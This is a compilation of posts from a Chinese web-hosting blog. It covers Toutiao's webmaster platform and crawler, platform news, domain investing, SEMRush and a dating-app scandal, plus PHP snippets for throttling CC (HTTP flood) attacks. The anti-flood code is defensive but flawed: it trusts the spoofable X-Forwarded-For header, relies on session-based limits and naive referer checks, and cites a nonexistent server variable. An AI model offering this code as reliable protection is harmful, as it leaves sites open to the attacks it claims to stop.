如上,头条内部团队正在孵化新的社交产品“抖信”,本月15号将会亮相。社交领域野心不死,拥有月活超5亿的抖音流量及大量用户资源,势必打造自己独立的IM社交软件(目前看是抖信),抖音搭桥牵线。 那以后抖音粉丝不用导入微信了,直接在抖信私人号成交,抖商将成为现实。而且基于视频及5g背景下推出的抖信超过微信不是没有可能,能否成功从微信口中夺一块肥肉应该被看得很关键。 对于我们来说,虽各大巨头竞相开启社交比拼,而夹缝中或许衍生一些机会,且这种内生的更好渠道流量变现才是最实际的。 主机吧很看好抖信,QQ刚开始起来的时候就是靠美女吸引用户,而抖音有是一个很大的美女池,必将吸引一大堆用户使用,到时腾讯今日头条一场大战是必不可少的了,很是期待,做为站长,只要在两虎相争中获利就好了。 #### 今日头条站长平台上线啦! 今日头条搞搜索引擎已经不是一两天的事了,如果经常看统计的话一定会惊奇的发现,偶尔网站会有几个IP来自今日头条,这是因为你的网站被今日头条搜索引擎收录了,主机吧的博客就常常有一两个IP来自今日头条,虽然少了点,但蚊子再小也是肉呀。 之前就有消息称今日头条要搞站长平台,不过一直没有听到啥消息,今天无意中看到今日头条在站长之家的投稿,居然早上线了~ 不多BB,直接上地址:https://om.toutiao.com/ 相比百度,今日头条可开明多了,支持多种第三方登陆 目前后台功能还没齐全 但基本功能都有了,可以提交sitemap、死链、还可以查看数据监控,甚至可以控制抓取频次,上次有人反馈被今日头条蜘蛛大量抓取导致服务器崩溃,用这个抓取频率设置可以解决这个问题。   总之,今日头条的加入,可以让站长得到更多的流量,是一件好事,毕竟百度一家独大站长们日子是不好过的,如果没有提交网站的同学尽快去提交吧! #### 今日头条站长平台:搜索蜘蛛爬虫spider介绍 头条搜索UA介绍 头条搜索的爬虫UA为“Bytespider”首写字母为大写。 例如: 例如:Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36(KHTML,like Gecko)Chrome/41.0.6633.1032 Mobile Safari/537.36;Bytespider;https://zhanzhang.toutiao.com 头条搜索ip字段介绍 头条搜索的ip字段总共涉及 6 个,具体字段如下: 110.249.201.0/24 110.249.202.0/24 111.225.148.0/24 111.225.149.0/24 220.243.135.0/24 220.243.136.0/24 基本流程 1.抓取网页。每个独立的搜索引擎都有自己的网页抓取程序爬虫(Spider)。爬虫顺着网页中的超链接,从这个网站爬到另一个网站,通过超链接分析连续访问抓取更多网页。被抓取的网页被称之为网页快照。由于互联网中超链接的应用很普遍,理论上,从一定范围的网页出发,就能搜集到绝大多数的网页。 2.处理网页。搜索引擎抓到网页后,还要做大量的预处理工作,才能提供检索服务。其中,最重要的就是提取关键词,建立索引库和索引。其他还包括去除重复网页、分词(中文)、判断网页类型、分析超链接、计算网页的重要度/丰富度等。 3.提供检索服务。用户输入关键词进行检索,搜索引擎从索引数据库中找到匹配该关键词的网页;为了用户便于判断,除了网页标题和URL外,还会提供一段来自网页的摘要以及其他信息。 #### 今日头条违规账号被封 禁言3591个,自媒体侵权3篇便封禁 10月11日 消息:10 月 10 日,今日头条旗下头条号平台发布公告,公布了 9 月版权保护专项行动的成果。公告称,为了保护原创打击搬运号,头条号 9 月封禁、禁言了 3591 个违规账号,同时对 443 个多次侵权、违规情节恶劣的违规账号予以永久封禁。 公告显示,因侵犯版权而受到平台处罚的头条号账号,主要包括搬运、篡改和歪曲等行为:一是未经许可转载、摘编整合或歪曲篡改新闻作品;二是通过“洗稿”方式抄袭剽窃、篡改删减原创作品;三是未经授权复制、表演、通过网络传播他人影视、音乐、摄影、文字等作品,或以合理使用为名对他人作品删减改编。 今日头条表示,平台在版权保护方面已建立起全网维权、灵识系统、原创内容版权登记证书、即时投诉反馈、侵权自媒体黑名单等功能和制度。未来还将持续加强保护内容版权,自媒体侵犯版权文章达 3 篇便将自动封禁。根据侵权惩处机制,每个自媒体账号都有 100 分的信用分,如被确认侵权,单篇文章将扣 40 分,信用分 0 分则永久封禁。 #### 今日防护日志:某客户网站被CC攻击被百度云防护智能拦截 好久没有写CC攻击的防御案例了,主要是现在黑客攻击网站的案例有点少。 不过,今天主机帮收到了百度智能云的短信提醒,某个客户正在遭受攻击。 主机帮登陆该客户网站查看处于正常打开状态,这个客户的网站是行业网站,平时流量不错,可能遭到竞争对手恶心攻击是正常的。 我们登陆百度云防护-攻击日志查看,发现攻击只有5分钟左右,这应该是竞争对手在某些黑客平台购买的攻击服务,攻击不大,但如果没有防火墙的话,足以瘫痪网站服务器。 建议大家网站有一定的流量的,一定要标配防火墙,最好是用云防火墙,可以有效拦截各类攻击,又不影响服务器性能,比如这位客户使用的百度云防护,就是一定云防火墙,集成加速、安全防御功能。 有需要的同学可以看下:https://zhujib.com/shop/26864.html #### 从 .com 到区块链,谈谈域名投资的上亿生意 域名投资是门老生意,不过现在他们也叫着 “去中心化” 了。2天前,全球最大游戏发行平台 Steam 宣布将推出新平台 “Steam中国”。这事儿在游戏迷看来是个大事,但我却想起 steamchina.com 的域名持有者5月份曾在贴吧询问该域名出售价格。短暂消失半月后,这位老哥兴致冲冲地发帖 “感谢各位,已谈拢”。但他现在可笑不出来了,发现该域名有可能被采用为 “Steam中国” 官方域名后,这位老哥只说了两句话:1.妈的,凉了;2.悲剧了,只卖了20万。同样是上月的新闻,Block-Chain.com 以600万人民币的价格成交,因为区块链技术的火热,它的价格四年涨了30倍。更别提1700万美刀的 360.com 或2400万人民币的 mi.com —— 雷军都觉得贼贵。域名很明显是门投资,但其不知怎么就富了和不知怎么就是卖不掉共存的属性,让人有足够的理由相信其中暗流汹涌。我辗转加到了 域名投资大神戴跃 的微信,他持有 jb.com、niubi.com、fn.com 等(单个就得七位数往上的)极品域名。但每天分享数十条涵盖行程、区块链会议、域名等信息的朋友圈,让他忙到没有时间接受采访,反倒抽空把我删了两次。我推测一是他确实很忙,二是接受采访对他的生意没有好处 —— 坏处估计倒不少。其实也想得通,如果你完全没听说过 “有人为7个字母付了上千万,只是买下来存着”,那一定是那人不想让你知道。我尝试与这个圈子接触,发现其中大多数人讳莫如深,即使愿意将行业信息事无巨细介绍一遍,末了也不愿意透露身份。快失望时,我碰到了王烈。因为谈融资,他不能马上回复我的问题,但表示过两天可以聊聊。如果要排个谱,王烈大概在国内域名行业的玩家里排前一百。他手下有大概1000个精品域名,比如 jiaju.cn、long.cn、shadu.com、moshu.com 等等,亮出来就能让域名交流群沉默。他本来是个公务员,也把个人网站做到过世界排名1000多(这两项都很难,如果你不知道的话),但去年已经丢掉了那些身份,一边做域名投资,一边参与 bbb.one 的建设 —— 全网数字货币交易平台(full network digital asset trading platform)。域名投资是门老生意了,但到了今天,这些神秘人却总是和区块链紧紧相连,即使是交谈起来让人觉得友好可靠的王烈也不例外。终于,他回我的微信了。VICE:你是如何进入域名行业的?王烈:我少年时代非常喜欢集邮。自从有了互联网,我就觉得人们可能不用寄信了,域名才是最佳入口,于是将集邮的兴趣改成域名。那时刚参加工作,我立刻办理了互联网开户,不久就注册了第一个域名。但是我大概花费了几年时间才知道什么叫做好域名,又花费了十年时间,才知道便宜少好货,越贵越升值。其实在我眼里,一颗好的域名,不仅能让同样项目的注册用户和活跃用户有几何级数的增长,还是美轮美奂的艺术品 —— 大多数的收藏都得束之高阁,只能孤芳自赏。什么样的域名才算好域名?过目不忘、便于传播,比如京东从 360buy 改为 jd。其次要输入简单,文化程度不高的人也能学会。我最初做网站的时候,换了一个看起来没有文化但非常简单易记的,网站访问量增大了几倍。“什么是好域名” 对懂的人来说就是本能反应,但很多好域名是注册不到的。互联网寻址技术有很多旁门左道,这个过程我也交了很多学费。最初的大部分域名我都是用手工注册,现在才明白得毫不犹豫地购买。我觉得一个合格的域名投资人需要是一个好的 “产品经理”,要知道用户的使用习惯与需求。域名生意应该怎么做?其实,靠手工或者是自己做个小程序就能抢到好域名的时代早就过去了,目前的域名抢注商动辄几千台服务器集群,几十家域名注册商合作,有点像比特币矿池。在库存方面,因为需要续费,所以专业投资人十分重视控制成本,多投精品,甚至极品。量化标准也很简单,一是简短的字母或数字;二是常用的拼音或英文;三是其他搜索量大的关键词,比如围绕家居行业,我拿了 jiaju.cn 和 aijiaju.com。我每天都会关注6、7个域名市场,也看很多科技类网站。.com 域名后缀的价值永远大于其他域名后缀吗?.cn 之类的?没错,com is king,价值毋庸置疑,全世界的网民经过这几十年印象都已非常深刻,甚至很多网民只知道这个后缀。但国家后缀域名的使用也非常广泛,比如 .de、.uk、.jp。其实4位以内的纯数字或者纯字母主流后缀域名(.com、.cn),都是比较有投资和收藏价值的。现在 Web 都在 App 化,域名价值会随着 App 增多而下降吗?这是一个伪命题。第一,手机里不可能装无数个 APP;第二,所有的 APP 不也都需要域名,以建立网站推广吗?第三,很多 APP 和小程序被发行商和平台扼住了喉咙,通过域名自建网站才能去中心化。域名商也讲 “去中心化” 还行。那你如何看待 “以前玩域名的,现在都玩区块链去了” 这句话?没错,最近我在厦门参加的 GDS 会议, 区块链热,域名会场冷场。上个月底我还参加了阿里云组织的小范围域名投资会议,会上就有人说,“最近所有的域名投资座谈,聊着聊着就变成了区块链和币圈”。其实域名投资人是好奇心很强的投资极客,当新兴的科技和投资机会出现时,迅速参与也是正常现象。域名是很好的数字资产,而区块链能够让数字资产更加便捷流通,所以这两者的结合是顺理成章的事情。比如你们的 vice.cn 是一家优秀的内容互联网,那么对其进行区块链改造,vice.cn 就升级为价值互联网,作者能更便捷地创造并获取价值,这样的价值互联网往往估值要比内容互联网高10倍以上。其实区块链对极品域名的市场需求是非常好的刺激,目前市场上天价成交的很多域名都是被区块链项目方购买了。4位以内主流域名和比特币是有很大的可比性的,比如总量限制、方便流通等。域名生意让你身上具有了什么特质?我本质上是一个域名收藏家,而非投资人,所以域名和资金流动相对缓慢。但从业这么多年,我没停止进步,所以最大的特质是坚持,第二是保持好奇心,它与商业机会密切关联,比如更早发现比特币和区块链的投资机会。有什么有趣的投资经历可以分享吗?投资非常严肃,错误就是损失,所以真谈不上有趣。好在域名投资的空间比较大,我曾从老外那用几千美金买到过很好的拼音域名,比如 qintai.com(琴台),非常适合做音乐项目,如获至宝。域名行业有很多传奇故事,uber.com 的主人用域名换了 UBER 公司 2% 的股份,后被公司花100万美元回购。估计现在域名的原主人大腿要拍断了。我亲眼见证的则是2002年的一个晚上,7000多个四数字域名没有续费(一共需要几十万)掉了下来,事后很多天才被全球的域名投资人注册。现在,这些域名的价值应该在七个亿以上。你是如何拿到 y.cn 和 long.cn 这种顶级域名的?十几年前看到有人叫卖 y.cn 时,我毫不犹豫就买下来了,当时一个很好的拼音才几百元,这个却花了几万。因为完全没有考虑回报的问题,只是觉得喜欢不容错过。事实上,这是仅有的一次低价买到单字母 .cn 的机会。接下来,单字母 .cn 一路飞涨,第二年就有人出价200万,却基本买不到了。之后的几年,同一批买到这些域名的人,大部分以几百万到几千万不等的价格卖掉,但我看好中长期价值。你的最高交易额度有多少?我很少高价出售域名,只是有时和朋友进行一些收藏交换,几十万到几百万的成交案例就不卖弄了。毕竟域名像原材料,而项目才是产品,靠出售原材料生存的往往是第三世界国家。你如何看待 贴吧.公司 这样的中文域名?我本身是中国人,也想看看几年后是否会有人使用,所以持有了一些。但中文域名注册十几年了,用户增长缓慢,还是不如其他主流域名的。很多人推销的中文网址和手机网址等都属于骗局,大部分投资人会血本无归的,新来的人投资此类域名还是谨慎为好。作者: Ricky 来源:vice #### 从APICloud平台停服,互联网云服务状态 APICloud平台已于2023年9月15日起停止运营其移动应用开发所有服务。这些服务包括但不限于应用开发服务、应用创建与编译服务、Studio3开发工具的使用,应用的mam版本更新与云修复,应用的推送与统计等。 对于需要继续使用移动应用开发的APICloud用户,用友开发者中心提供了高性能的移动开发服务,欢迎大家前往体验。然而,如果还未进行账户迁移的开发者,请务必在2023年9月15日前完成账户迁移,以免APICloud平台停止服务后账户被锁定无法使用,影响各位开发者项目APP的正常发版更新。 互联网云平台的短暂性 值得注意的是,尽管APICloud平台已经停止运营,但这再次提醒我们,互联网云平台并不长久。随着科技的不断进步和市场环境的变化,任何一家互联网云平台都可能面临着被取代或关闭的风险。因此,对于依赖某一特定云平台的用户来说,除了选择稳定且长期运营的云平台外,还需要做好数据备份和转移的准备,以防万一。 #### 他们通过研究SEO实现月收入1亿美元 本文分享的是Oleg和Dmitri的创业故事,讲述他们是如何通过SEMRush月入 1 亿美元,并获得 600 万用户的。据介绍,SEMRush是一个“多合一营销工具包”,主要为SEO、内容营销、社交媒体和竞争研究提供解决方案,帮助企业获得更多流量,增加销售额。 一个问题引发的“连锁反应” 2001 年,Oleg向他儿时的小伙伴Dmitri请教关于搜索引擎优化的问题,对于他们来说,当时SEO还是一个新奇事物。兴趣让他们开始试验、编写代码并在俄罗斯电子商务企业中从事SEO工作。 7 年后,他们发布了SEMRush的第一个版本,在他们决定全身心投入之前,公司的收入在 4 年里增长了一倍,达到 100 万美元。到 2019 年,SEMRush月收入达到了 1 亿美元,并拥有超过 6 万的客户和 600 万的免费用户。 他们是如何做到的呢?以下是他们的用户增长秘诀: 1、专注行业 2000 年,Oleg作为一名信息安全专业的学生接触到了SEO后,他就爱上了这个行业。他的发小Dmitri于 2001 年加入,从那时起,他们就一直专注于SEO行业。从事这个行业接近 20 年,他们完全专注于解决自然搜索问题:研究如何从搜索引擎获取更多流量。 多次实验了解到有助于网站在Google中排名较高的因素之后,他们于 2006 年发布了他们的第一个SEO工具:SEOQuake。可以说,这是SEMRush的第一个版本: 自从进入SEO行业之后,Oleg和Dmitri20 年来从未停止对SEO的研究。随着网站数量成倍增加,增加自然流量这件事也变得越来越重要: 对于创业者来说,运气很重要,但坚持也同样重要。“基本上,我们只是弄清楚了什么对我们来说很有趣,以及我们准备朝着什么努力”Oleg如是说。 2、联盟会员计划 由于Oleg和Dmitri不擅长营销,为此,他们推出了SEMRUSH 会员计划,博客作者、付费搜索爱好者、代理商等可通过加入该计划,赚取高达40%的SEMrush订阅销售定期佣金。(远高于多数SaaS联盟计划30%的佣金)。 事实上,联盟计划并不是SEMRush的附加功能,在早期,这是他们的主要增长渠道。而这些联盟会员多数在Twitter上有很高的关注度,并且极具说服力。 为了让你大致了解该计划的规模,让我们看一下在线营销博客Bloggers Passion的推广数据。自 2016 年以来,他们一直在推广SEMRush,并获得超过 25 万美元的佣金: 按照40%的佣金比例计算,他们已经为公司带来了62. 5 万美元的营收,净利润37. 5 万美元。也就是说在 0 购置成本的情况下,他们每个月净赚7. 8 万美元。 除了联盟计划之外,SEMRush也有自己的专业销售团队。到 2018 年时,SEMRush已经拥有 500 名员工,内部销售团队有 50 个销售代表。他们的工作重心不在于扩展新的用户,而是扩展现有客户。他们的任务就是挖掘潜在的免费用户,将其发展为付费用户。 销售代表会不断地向现有用户提供诱人的加价优惠,比如在转换为折扣年度计划时提供免费培训课程,老用户比新用户价格便宜 5 倍等。 3、横向产品扩展 对于SEMRush来说,用户流失并不可怕,在不增加任何新客户的情况下每月增加收入才是他们的目标。 2018 年,SEMRush的月度收入波动率达到105%。这意味着,如果SEMRush每月不增加任何新客户,他们的收入需增加5%。假设此时每年的收入为 8000 万美元,每月收入为 660 万美元……也就是说SEMRush每个月至少要从现有客户那里增加 33 万美元的新收入。这可能吗? 答案是肯定的。SaaS业务通常具有三个轴可扩展: 数据–访问该工具提供的更多数据 用户–客户帐户中的更多人可以使用该工具 功能–访问更多功能 一直以来,SEMRush都将大量投资用于构建功能,目前,SEMRush提供了广告研究、反向链接、关键字研究、流量分析、SEO写作助手、市场资源管理器、网页SEO检查器、位置追踪、社交媒体跟踪器等诸多功能。允许他们以较低的成本为用户提供更多价值,他们甚至通过SEMRush Marketplace进入了内容创建空间: 数据显示,自 2008 年推出以来,每位用户的平均收入增长了 6 到 7 倍,自 2016 年以来增长了两倍多。 不仅如此,SEMRush还计划通过其市场提供许多其他营销服务类型: 如果要用一句话描述SEMRush在过去十年中的发展,那么“无处不在”或许最好的形容。值得注意的是,过去 8 年来,SEMRush在谷歌广告上的花费却不到 3000 美元。得益于联盟计划,SEMRush在社交媒体上得到了大量的推广。因此,当提到SEMRush时,Oleg可以很自豪地说“你看,每个人都在使用SEMRush。” 注:原文编译自saasmarketer,原文标题《SEMRush: The $100m Black Sheep Of SaaS》 #### 他趣被爆陪聊妹子多是假的?官方回应:严厉打击虚假社交 3 月 15 日消息,真实社交,搭讪秒回 —— 这是男女互助脱单平台“他趣”官网首页的 Slogan。近日“他趣”公开宣布,用户总数已经突破 2 亿。然而,新浪科技调查发现,男性用户在他趣平台上聊的“小姐姐”,实际上可能是“抠脚大叔或已婚妇女”! 在一家名为“校园邦”的兼职机构中,“聊天回复员”是一个庞大的组织群体,且人数高达上万人。这些“聊天回复员”的身份或男或女,年龄层次不齐,通过简单的“培训教程”和“撩人秘籍”后上岗 —— 他趣平台的男性,就是这些“回复员”的主要聊天对象,而索要礼物,成为了“回复员”的终极目标。 3 月 15 日晚间,他趣官方回应,严厉打击平台虚假社交行为;鼓励用户对疑似“套路聊”、“虚假社交”等行为进行线索举报,一经核实,最高奖励现金 10 万元。 他趣表示,平台一直采取“免费观看、付费打赏、自愿充值、余额退款”的基本原则开展在线服务,平台坚持用户用心交流、真实交友,用户充值、送礼行为均系其自发自愿。平台从未通过任何渠道向女用户暗示“诱导男用户送礼”等行为,上述行为一经发现,平台将进行严肃处理。 以下为他趣回应全文内容: 今日对于“校园邦”的兼职机构内,发现有聊天回复员活跃于社交平台的报道中,提及他趣等平台。对此,我们高度重视,并第一时间成立专项工作组。同时为平台可能存在这一风险和误解,向用户表示深深的歉意,并就平台目前已开展网络生态整治工作公示如下: 一、平台抵制一切虚假社交和“套路聊”行为 他趣坚持以用户为中心,诚信经营,严厉打击平台虚假社交行为。“套路聊”行为违背了“真实交友、用心交友”的基本原则,是典型的虚假社交行为,这是平台严格禁止和坚决打击的。 平台在此郑重声明,我们鼓励用户对疑似“套路聊”、“虚假社交”等行为进行线索举报,一经核实,最高奖励现金 10 万元。 二、平台严厉打击诱导充值行为 平台一直采取“免费观看、付费打赏、自愿充值、余额退款”的基本原则开展在线服务,平台坚持用户用心交流、真实交友,用户充值、送礼行为均系其自发自愿。平台从未通过任何渠道向女用户暗示“诱导男用户送礼”等行为,上述行为一经发现,平台将进行严肃处理。 三、平台坚持真人社交、严格用户认证 平台坚持“真人社交”,并建立了包含“真人认证”、“实名认证”相互关联的认证体系。为确保在线用户的真实性,用户需通过手机实名、身份证实名等多种方式进行实名认证,并对用户头像等多种信息进行要素一致性比对,以确认用户信息的验证一致。此外平台对认证用户进行常态化巡检,旨在有效杜绝虚假用户或冒名用户。 四、平台将进一步加强黑灰产、套路聊等网络乱象的打击力度 他趣对平台“假社交真陪聊”行为零容忍,我们已与反诈、网安以及网信管理部门建立长期合作关系,定期向有关部门提交打击网络黑灰产报告。平台对不法行为进行核实和记录,锁定账号等身份标识后,将线索第一时间上报给属地管理部门,配合有关部门进行专项侦查。 我们重视发挥用户在肃清网络环境工作中主体作用,在 App 内活动页面右上方、直播间上方及用户聊天窗口等多处显要位置均设置了“一键举报”快捷按钮,平台在收到用户举报后,内容风控部门第一时间安排专职工作人员进行核实,并通过关联特征分析排查关联主体,集中处理。情节严重的,报送网信等管理部门。 虚假社交问题破坏平台生态,企业对此绝不姑息,坚决严肃处理。同时,他趣会进一步提高风险意识,深化平台监管责任,在薄弱环节持续投入,长期开展净网工作,并定期向大众公示。 “探索社交公平初心,追求美好生活”是我们坚定不移的初心,为用户创造价值,才是企业存在的价值。平台安全工作任重道远,我们必将竭尽最大努力杜绝别有用心的人利用平台做出不法之事,守护平台用户的情感与财产安全。邀请社会各界对我们进行监督与批评,与我们一起共建和谐的社交生态。 厦门海豹他趣信息技术股份有限公司 2022 年 3 月 15 日 #### 代理开通百度云加速如何CNAME接入教学 最近好多客户不懂得如何CNAME接入百度云加速,这里主机吧写个教学教大家。 其实在主机吧这边开通的不需要自己帐户添加域名,主机吧会把域名开通后分配至你自己的帐户管理,我们只需要在后台显示出来域名后接入操作即可。 第一步:点击进入“继续接入” 第二步:添加子域名, 子域名写:WWW(不带WWW写@),指向写:服务器IP或者虚拟主机解析别名 第三步:解析TXT记录,解析别名, 第四步:到域名管理处(域名注册商)解析以上记录 需要注意的是如果网站@记录解析与TXT解析冲突的,我们先不要做@记录别名解析,等域名TXT验证域名生效后,我们再在域名解析删除掉TXT记录,再解析@记录别名解析即可。 云加速的最后一步选择套餐接入的,我们可以选择忽视他,因为我们已经在代理开通过收费版了,所以不需要这个操作。 好了,以上就是在百度云加速代理开通域名的CNAME接入方法了,如有不懂的可以留言主机吧。 #### 代码托管平台 GitHub 遭到攻击 2 月 1 日消息,微软旗下的代码在线托管平台 GitHub 今天表示遭到网络攻击,入侵者访问了部分代码储存库,并窃取了签署 Desktop 和 Atom 两款应用的代码签名证书。 代码签名证书用于在代码中植入一个加密戳记,以明确这些代码的开发者。入侵者在窃取了 Desktop 和 Atom 两款应用的代码签名证书之后,可以用于签署恶意篡改的非官方版本。GitHub 表示 Desktop 和 Atom 的当前版本不受凭据盗窃的影响。 GitHub 在公告中表示:“入侵者窃取了一组加密的代码签名证书,该证书经过了密码保护,目前并未发现证据表明入侵者使用该证书。但作为预防措施,我们将撤销用于 GitHub Desktop 和 Atom 应用程序的公开证书”。 GitHub Desktop for Windows 并未受到影响。影响的 GitHub Desktop for Mac 版本: 3.1.2 3.1.1 3.1.0 3.0.8 3.0.7 3.0.6 3.0.5 3.0.4 3.0.3 3.0.2 Atom 版本 1.63.1 1.63.0 #### 代码托管平台GitHub开发者用户数达1亿 1月30日 消息:代码托管平台 GitHub宣布,现在有1亿开发人员正在使用该平台。这个数字比对比五年前微软以75亿美元收购 GitHub 时声称的2800万用户大幅增加。 自2008年推出以来,GitHub已经走过了漫长的道路,现在已成为数百万开源和专有软件项目的默认托管服务,允许来自不同地区的开发人员共享代码库进行协作。 GitHub自2008年推出以来取得了长足的进步,现在作为数百万开源和专有软件项目的默认托管服务,允许开发人员围绕来自不同位置的共享代码库进行协作。 GitHub 的公告称,“我们所做的一切都是将开发人员放在首位。”在2019年的一次主题演讲中,前首席执行官纳特·弗里德曼表示,该公司的目标是到2025年开发人员达到1亿人。因此,它似乎比计划提前两年达到了这一里程碑。 对于微软来说,GitHub有助于它与软件开发领域的合作。TechCrunch报道 指出,GitHub 的各种付费计划“现在每年为微软带来约10亿美元的收益。” #### 代码解决网站被恶意刷流量 CC 攻击问题 经常有站长遇到网站被人恶意刷流量,api接入口被人恶意刷新等CC攻击问题。 想要解决,奈何口袋里又没钱买不起高防产品怎么办? 我们可以通过代码的方式自定义访问频率时间限制解决那些恶意攻击。 优势: 可以自由设置访问频率时间,可以以月为时间长度简单易用,无论你懂不懂 PHP 开发,只要会复制粘贴就行。Memcached 内存缓存技术,高性能,高并发。精准无误,0 误封。能防护 QPS 10000 以内的CC攻击,看机器配置,有可能更高。支持范围较广,直接你网站支持 PHP 就行。源码简单,可自行修改,可以套自己喜欢的前端模板主题。 要求: PHP 版本 ≥ 7.2PHP 需安装 Memcached 扩展Memcached ≥1.6 使用方法 以下开源代码添加到你网站核心文件中,相当于你网站任何页面都会引用的一个文件,类似于:config.php WordPress 网站添加到根目录的 /index.php 头部即可,即控制所有的页面访问,如果想要控制单独某个页面,只需要将此代码放到此页面的 PHP 内即可。 其他 PHP 网站根据你的程序逻辑决定。 <?php ini_set("display_errors", "Off"); error_reporting(E_ALL ^ E_NOTICE ^ E_WARNING); extension_loaded('memcached') or die('memcached扩展未安装!'); $logPath = $_SERVER['DOCUMENT_ROOT'] . '/waf/waf.log'; //日志记录文件保存路径,$_SERVER['DOCUMENT_ROOT']是网站根目录 $fileht = $_SERVER['DOCUMENT_ROOT'] . '/waf/ban.log'; //被拉黑IP记录文件保存路径 if (!file_exists($logPath)) { @mkdir($_SERVER['DOCUMENT_ROOT'] . '/waf/', 0777, true); @file_put_contents($logPath, ''); @file_put_contents($fileht, ''); } $allowtime = 2; //防刷新时间(秒) $allownum = 5; //防刷新次数(比如2秒5次,超过就警告) $allowRefresh = 10; //在此警告次数之后拉黑IP $bantime = 600; //封禁时间,超时自动解封(秒) $ip = $_SERVER['HTTP_X_FORWARDED_FOR'] ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; $uri = $_SERVER['PHP_SELF']; $cache = new Memcached(); $cache->addServer('127.0.0.1', '11211') or die('memcached连接失败!'); $inban = $cache->get('waf-ban-' . $ip); if ($inban) { header("HTTP/1.1 403 Forbidden"); exit('<h1>403 Forbidden 非法访问</h1> <p>你的请求似乎不符合常理,已被服务器防火墙拦截,如有疑问请联系管理员zhujib.com</br>如果你在开发测试过程中超频被封IP,请等待' . ($bantime / 60) . '分钟后自动解封</br>你的IP:' . $ip . '</p>'); } $wafarr = $cache->get('waf-' . $ip); if (!$wafarr) { $wafarr = ['path' => $uri, 'time' => time() + $allowtime, 'sum' => 1, ]; $cache->set('waf-' . $ip, $wafarr, time() + $allowtime); } else { if ($wafarr['sum'] > $allownum) { $wafsum_arr = $cache->get('waf-sum-' . $ip); if (!$wafsum_arr) { $wafsum_arr = ['sum' => 1, ]; $cache->set('waf-sum-' . $ip, $wafsum_arr, time() + $bantime); } else { if ($wafsum_arr['sum'] > $allowRefresh) { $cache->set('waf-ban-' . $ip, 1, time() + $bantime); file_put_contents($fileht, $ip . "\n", FILE_APPEND); } else { $wafsum_arr['sum']++; $cache->set('waf-sum-' . $ip, $wafsum_arr, time() + $bantime); } } file_put_contents($logPath, $ip . '--' . date('Y-m-d H:i:s', time()) . '--' . $uri . "\n", FILE_APPEND); header("HTTP/1.1 403 Forbidden"); exit("请求频率QPS超过限制,请酌情访问,多次提醒后会封禁IP!"); } else { $wafarr['sum']++; $cache->set('waf-' . $ip, $wafarr, $wafarr['time']); } } 该方法能防御市面上那些以高频率请求的恶意CC攻击,并不能100%防御所有CC攻击,但对可以解决绝大多数小型CC攻击了,如果有更高防御要求,建议购买性价比非常高的百度云加速或京东云星盾。相关链接 #### 代码解决轻量级CC攻击方法 CC攻击(HTTP Flood攻击)是一种通过发送大量请求来占用服务器带宽和资源的攻击方式。虽然PHP可以用于构建Web应用程序,但其本质上并不是一种防御CC攻击的工具。因此,PHP代码本身无法完全解决CC攻击,然而,我们可以采取一些措施来减轻其影响。以下是一些轻量级的代码示例: 1.限制请求速率:您可以编写代码来限制来自单个IP地址的请求速率,例如每秒只允许几个请求。这可以减缓攻击的影响,并减少服务器资源的使用。下面是一个简单的PHP代码示例,用于限制每秒钟只允许2个请求: session_start(); $ip = $_SERVER['REMOTE_ADDR']; $key = 'ip_'.$ip; if (!isset($_SESSION[$key])) { $_SESSION[$key] = 0; } if ($_SESSION[$key] > 2) { http_response_code(429); // 返回状态码429表示太多请求 die('Too many requests'); } $_SESSION[$key]++; 2.防止请求伪造:攻击者可能会伪造请求,以绕过速率限制或其他安全措施。您可以编写代码来验证请求的来源和内容。下面是一个示例代码,用于验证请求是否来自正确的来源: $expected_domain = 'example.com'; if ($_SERVER['HTTP_REFERER'] != 'http://'.$expected_domain.'/') { die('Invalid referer'); } 3.限制来自客户端的HTTP请求大小:可以使用PHP的post_max_size和upload_max_filesize设置。这些设置允许您设置POST请求和上传文件的最大大小。如果请求大小超过这些限制,PHP会返回一个错误。 以下是如何在PHP中设置这些限制的代码示例: // 设置POST请求的最大大小为10MB ini_set('post_max_size', '10M'); // 设置上传文件的最大大小为10MB ini_set('upload_max_filesize', '10M'); 这将限制POST请求和上传文件的大小,以确保不会过多地消耗服务器资源。需要注意的是,这些设置是全局设置,将应用于所有请求,因此需要根据您的应用程序需要进行配置。 除此之外,您也可以编写代码来在服务器端处理HTTP请求,以确保它们符合您的要求。例如,您可以检查POST请求的大小并拒绝过大的请求。以下是一个示例代码: // 限制POST请求的大小为10MB $max_size = 10 * 1024 * 1024; // 10MB if ($_SERVER['REQUEST_METHOD'] == 'POST' && $_SERVER['CONTENT_LENGTH'] > $max_size) { http_response_code(413); // 返回状态码413表示请求实体太大 die('Request entity too large'); } 这将检查POST请求的大小,并在其超过限制时返回一个错误。需要注意的是,此代码仅检查请求实体的大小,并不包括请求头。如果您需要检查整个请求的大小,可以使用$_SERVER['CONTENT_LENGTH'] + strlen($_SERVER['REQUEST_METHOD'] . $_SERVER['REQUEST_URI'] . $_SERVER['SERVER_PROTOCOL']) + count($_SERVER['HTTP'])来计算请求的总大小。 这些示例代码都比较简单,可以帮助您减轻CC攻击的影响。但需要注意的是,这些代码并不能完全解决CC攻击,因此您仍然需要使用其他安全措施来确保您的服务器安全。 主机吧推荐使用云防火墙来进行防御CC攻击: 百度云加速 百度云加速是百度旗下为网站提供一站式加速、安全防护和搜索引擎优化的产品。提供四到七层的DDoS攻击防护,包括CC、SYN flood、UDP flood等所有DDoS攻击方式, 通过分布式高性能防火墙+精准流量清洗+CC防御+WEB攻击拦截,组合过滤精确识别,有效防御各种类型攻击。 优惠链接https://zhujib.com/yunjiasu.html 京东云星盾SCDN 京东云星盾SCDN安全加速(SCDN,Secure Content Delivery Network),是京东云推出的一体化分布式安全防御产品,提供免费 SSL 证书,集成 Web 攻击防护、CC 攻击防御、BOT 机器人分析,并将内容分发加速能力融于一身。在边缘节点注入安全能力,形成分布式的安全加速网络,让您的业务更安全、体验更流畅。适用于所有兼顾安全和内容加速的业务。 优惠链接:https://zhujib.com/jdxingdun.html #### 代购高风险:淘宝店TSHOW走私被判10年罚款550万! 做了3年淘宝代购店,如今因走私逃税被判刑10年,并处罚金550万。 这张某淘宝代购店主的道歉信截图被放到网上后,顿时引发了诸多争议。 有网友斩钉截铁地表示,这是假的,量刑时间太假。 然而,其他网友翻出了店主写的道歉信。 更重要的是,法院的刑事判决书已经在8月份就下来了。   